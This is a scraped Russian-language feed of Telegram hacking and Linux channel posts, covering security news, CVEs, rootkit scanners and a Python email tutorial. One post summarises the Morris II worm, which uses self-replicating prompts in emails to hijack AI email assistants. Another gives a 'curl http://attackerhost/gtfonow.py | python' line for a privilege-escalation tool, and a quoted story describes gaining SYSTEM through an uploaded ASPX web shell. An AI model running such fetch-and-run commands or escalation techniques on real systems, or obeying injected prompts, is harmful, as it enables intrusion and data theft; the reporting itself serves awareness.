Social engineering books - книги по хакингу и информационной безопасностb
Linux academy - лайхаки, полезные инструменты для работы с linux
Linux books - полезные и актуальные книги о Linux.
Вакансии сетевого администратора
Linux academy - лайхаки, полезные инструменты для работы с linux
Linux books - полезные и актуальные книги о Linux.
Вакансии сетевого администратора
👍18❤6🔥2
— новая гроза почтовых клиентов с AI-фичами
Группа исследователей из Израильского технологического института и компании Intuit разработали червя Morris II, который заточен на атаки нейросетевых приложений и почтовых клиентов с поддержкой нейросетевых функций. Morris II способен красть личные данные, внедрять вредоносное ПО, спамить пользователей и распространяться через несколько связанных сервисов.
Исследование демонстрирует, что злоумышленники могут использовать запросы (например, в обычном письме), которые при обработке генеративной нейросетью заставляют её воспроизводить входные данные в качестве выходных и совершать вредоносные действия. Червь был протестирован против трёх различных моделей — Gemini Pro, ChatGPT 4.0 и LLaVA, а также оценены различные факторы (например, скорость распространения, репликация, вредоносная активность), влияющие на его эффективность.
В данный момент речь идёт о научном исследовании в искусственно созданной среде, и, по словам авторов, пока нет признаков того, что подобные черви уже действуют в интернете, но это лишь вопрос времени. Команда сообщила о своих результатах в Google и OpenAI.
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17❤3🔥3😁2
Учите Python, он везде)
1 шаг — установка внешних библиотек
pip install python-decouple opencv-python pyzbar IMAPClientdecouple — для чтения данных из файлаopencv — для чтения изображения с QR-кодом pyzbar — чтобы прочитать данные, закодированные в QR-кодеIMAPClient — с помощью неё будем работать с сообщениями на почтовом сервереТак как мы будем использовать пароль приложений, а также логин от аккаунта Google, то в коде его желательно не использовать. Поэтому, необходимо создать файл «.env» с примерным содержимым:
login = "test@gmail.com"
pwd = "gffg sbbp jccj vhhi"
2 шаг — импорт библиотек
3 шаг — считывание данных из QR-кода
4 шаг — отправка письма
5 шаг — чтение почты
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍23❤7🔥3
Windows Matrix UHD.png
3.6 MB
На вскидку здесь их 200+, не считал
Всё удобненько сгруппировано, чтобы можно было сориентироваться и сразу понять, как...
...тестировать свою Windows, а иначе для чего это всё
Ну вы понимаете)
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍40❤7🔥7👎2😁1
Годная статья, в которой описываются разные техники повышения привилегий и закрепления в системе.
— «На одном из недавних проектов мы обнаружили возможность записывать данные в папку веб-сервера IIS без авторизации. Мы сделали ASPX-файл, загрузили его на сервер и обратились к нему через браузер. Таким образом мы получили возможность исполнять команды в рамках контекста веб-сервера, а он, так же, как MS SQL, имеет привилегию имперсонализации. Мы сделали имперсонализацию и поднялись до системных привилегий. Создали себе учетную запись, зашли на этот веб-сервер через парадную дверь и начали продвигаться по инфраструктуре.»
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍32🔥8❤7
13 марта 2013 года был выпущен Kali Linux
С прошедшим днем рождения любимый дистрибутив хакеров 🎂 👾
@linuxkalii
С прошедшим днем рождения любимый дистрибутив хакеров 🎂 👾
@linuxkalii
👍111🎉40❤21🔥6
Разработчики Tor Project объявили о запуске новой функции — мостов WebTunnel, которые работают на основе устойчивого к обнаружению HTTPT-прокси и позволяют трафику Tor лучше смешиваться с обычным HTTPS-трафиком.
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍32🔥8❤7
This media is not supported in your browser
VIEW IN TELEGRAM
Данный инструмент предназначен для автоматической эскалации привилегий в Unix‑подобных системах через команду
sudo, также через атрибут SUID бинарных файлов в системе с использованием базы GTFOBins.Основные особенности:
curl http://attackerhost/gtfonow.py | python@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
❤15👍8🔥4🤯2
Все инструменты и ссылки бесплатны и постоянно обновляются.
🔗 https://colliertr.github.io/OSINT-dashboard/
#OSINT #OSINT4Good
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥21👍6❤4
Forwarded from Информационная безопасность
⚠️ Российские хакеры APT 28 запустили масштабные фишинговые атаки, нацеленные на правительства и неправительственные организации по всей Европе, Северной и Южной Америке и Азии.
В этих атаках используются поддельные документы и письма, которые выглядят официальными.
Подробнее: https://thehackernews.com/2024/03/apt28-hacker-group-targeting-europe.html
#кибербезопасность
Hacking
В этих атаках используются поддельные документы и письма, которые выглядят официальными.
Подробнее: https://thehackernews.com/2024/03/apt28-hacker-group-targeting-europe.html
#кибербезопасность
Hacking
👍43🤬13❤9🔥5😁2
🚨 Обнаружена критическая ошибка в плагинах miniOrange для WordPress.
Если вы используете miniorange сканер вредоносных программ (≤ 4.7.2) или брандмауэр веб-приложений (≤ 2.1.1), НЕМЕДЛЕННО УДАЛИТЕ ИХ.
Уязвимость позволяет злоумышленникам завладеть вашим сайтом.
Подробнее: https://thehackernews.com/2024/03/wordpress-admins-urged-to-remove.html
@linuxkalii
Если вы используете miniorange сканер вредоносных программ (≤ 4.7.2) или брандмауэр веб-приложений (≤ 2.1.1), НЕМЕДЛЕННО УДАЛИТЕ ИХ.
Уязвимость позволяет злоумышленникам завладеть вашим сайтом.
Подробнее: https://thehackernews.com/2024/03/wordpress-admins-urged-to-remove.html
@linuxkalii
👍23🔥4❤3👏2🤬2🎉1
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍34🤔8❤4👎2🔥2
aiohttp — это опенсорсная библиотека, построенная на основе I/O фреймворка Asyncio и предназначенная для обработки большого количества одновременных HTTP-запросов без традиционного потокового нетворкинга. aiohttp часто используется технологическими компаниями, веб-разработчиками, бэкенд-инженерами и специалистами по анализу данных для создания высокопроизводительных веб-приложений и сервисов, объединяющих данные из множества внешних API.aiohttp обновилась до версии 3.9.2, в которой устранили уязвимость CVE-2024-23334. Это path traversal баг, затрагивающий все версии aiohttp (начиная с 3.9.1) и старше, который позволяет удаленным злоумышленникам без авторизации получить доступ к файлам на уязвимых серверах.follow_symlinks в значение True для статичных маршрутов, что позволяет получить несанкционированный доступ к файлам за пределами статичного корневого каталога сервера.@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍27❤3🔥3🤩1
Только вдумайтесь: из каких-то «шорохов» можно вычислить рисунок на подушечке пальца, это фантастически красивая атака по сторонним каналам!
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍29🤯20🔥4❤2😁2
Руткит — это вредоносная программа, которая позволяет неавторизованному пользователю (читай злоумышленнику) получить доступ к системе и ее ограниченному программному обеспечению.
В этом посте мы поговорим о 2 самых известных программах с открытым исходным кодом —
chkrootkit и rkhunter. Мы можем установить их в Kali Linux или любой другой дистрибутив Linux и проверить наш компьютер на наличие руткитов.chkrootkit — это простая программа, которая может гарантировать, что наш Kali Linux не был заражен. Мы также можем запустить chkrootkit на других дистрибутивах Linux, установив его на эти системы.Ставится
chkrootkit очевидным образом:sudo apt install chkrootkitДля проверки на наличие руткитов нужно просто запустить
chkrootkit:sudo chkrootkitrkhunter — это инструмент на базе Linux/Unix для сканирования возможных руткитов, бэкдоров и локальных эксплойтов.Для этого он сравнивает SHA-1 хэши важных файлов с известными хорошими файлами в онлайн-базах данных, ищет каталоги по умолчанию (руткитов), неправильные разрешения, скрытые файлы, подозрительные строки в модулях ядра и специальные тесты для Linux.
Он не поставляется предустановленным в Kali Linux, поэтому:
sudo apt install rkhunterПосле установки мы можем запустить
rkhunter для сканирования всей нашей системы:sudo rkhunter -cТакже сохраняет выходной файл журнала в
/var/log/rkhunter.log@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍50❤8🔥7🥰1